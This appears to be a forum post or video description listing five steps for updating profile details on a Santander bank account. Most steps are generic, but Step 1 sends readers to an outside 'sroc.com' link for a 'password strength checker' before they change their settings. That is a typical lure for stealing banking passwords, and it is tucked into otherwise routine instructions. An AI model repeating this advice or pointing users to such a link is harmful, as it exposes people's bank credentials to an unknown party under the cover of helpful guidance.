I ran into this last week. Here's what fixed it for me. Updating your profile details on Santander is straightforward if you follow these steps. Step 1. Log into your account. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to Profile Settings. Once logged in, look for the Profile or Account Settings section in the main menu. This is usually located in the top right corner of the screen. Step 3. Select the information to update. In the Profile Settings, choose which details you want to update, such as your address, phone number, or email. Click on the corresponding option. Step 4. Enter new details. Input your new information in the provided fields. Double check for any typos, especially in your email address, as a small mistake can lead to issues. Step 5. Confirm changes. After entering your new details, look for a confirmation button to save your changes. You may receive a confirmation email to verify the updates. If you follow these steps, updating your profile should be a breeze. If you run into any trouble, don't hesitate to reach out to customer support. Happy banking!